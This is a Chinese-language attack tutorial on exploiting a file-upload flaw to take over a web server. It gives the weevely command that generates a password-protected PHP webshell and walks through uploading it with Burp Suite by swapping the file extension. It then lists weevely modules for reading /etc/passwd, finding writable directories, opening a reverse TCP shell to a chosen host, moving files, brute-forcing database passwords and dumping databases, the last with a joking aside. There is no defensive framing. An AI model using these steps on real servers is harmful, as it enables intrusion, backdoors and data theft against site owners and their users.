利用文件上傳漏洞遠程控制服務器
1. 生成木馬
weevely generate 1234 /123.php
這是weevely工具自己生成的木馬,而不是自己編寫的一句話木馬
注意 1234是密碼 ,,/ccq/abc.php是生成的文件,如果存在會覆蓋,不存在會新建文件。
2. 更改木馬后綴名
3. 利用burpsuit上傳木馬
瀏覽器設置代理
burpsuits正常抓包
添加文件
抓取數據
更改后綴名
轉發
查看木馬位置
4. 連接木馬
成功連接
雙擊tab補全命令
5. 執行任意命令
在虛擬終端模式下需要使用模塊直接在前面加上 ’:’ 即可
全局操作
-audit.userfiles -枚舉用戶目錄下的具有權限的文件(可加載用戶字典),默認情況下字典很小(注意:該模塊目前只支持linux,windows不支持) -audit.systemfiles [logs|root|home|…] -枚舉各種系統目錄並尋找可讀寫的目錄,模塊僅默認搜索部分linux下的常見目錄,logs、root、home等等(注意:該模塊也僅支持linux,windows不支持) -audit.phpconf -查看php配置信息 -audit.etcpasswd [-real] -查看/etc/passwd文件(特殊說明:很多命令的-vector參數是用以指定php執行命令函數的,當默認函數不可用是,使用該參數來嘗試指定其他命令執行函數來獲取信息),同時也可使用-real參數來過濾出真實用戶 -audit.mapwebfiles -從指定url開始爬取目標站點結構,可用-depth參數來指定爬取深度
系統操作
-shell.sh/shell.php -利用接口執行命令,和虛擬終端類似,這里就不給演示了 -system.info -在weevely里比較由用的一個模塊,可以獲取到系統的基本信息 -backdoor.reverstcp host port [-vector] -反彈一個tcp shell到目標端口(同樣也可指定向量:選擇反彈shell的形式,nc,perl,ruby等) -backdoor.tcp -port <listen_port> -no-connect [-vector] -在本地打開一個端口,等待連接(查看了該模塊的源碼,使用時必須帶上-no-connect才能監聽成功,負責他會在本地形成一個tcp環路) -net.ifaces -查看網絡ip地址
文件操作
-file.upload lpath rpath -上傳本地文件到目標站點指定路徑 -file.rm filename [-recursive] [-vector] -刪除指定文件,可開啟安全確認模式 -file.check -用以檢查目標站點下文件的狀態(md5值,大小,權限等) -file.download rpath lpath [-vector] -將目標站點上的文件下載到本地(可用於批量會話操作) -file.edit filename -對指定文件進行編輯 -file.read filename -讀取指定文件內容 -file.ls path -列覺指定路徑的文件信息 -file.upload2web -將本地文件上傳至目標站點文件夾(可自動枚舉到一個可寫目錄將其寫入) -file.webdownload <webfile_path> filename -從其他服務器上下載文件到目標站點 -file.touch rpath
-創建一個新文件
下面幾個命令由於環境限制,沒有進行測試
-bruteforce.sql(爆破指定數據庫用戶名密碼) -bruteforce.sqlusers(爆破所有數據庫用戶密碼) -sql.dump(脫褲,你懂的 ^_^) -sql.console(sql交互式終端) -net.scan(端口掃描,不太會用) -find.perms(搜索具有讀、寫、執行權限的文件,好像比較給力) -find.suidsgid(搜索linux具有suid或者sgid標記的文件) -find.name(查找某文件或者文件夾)












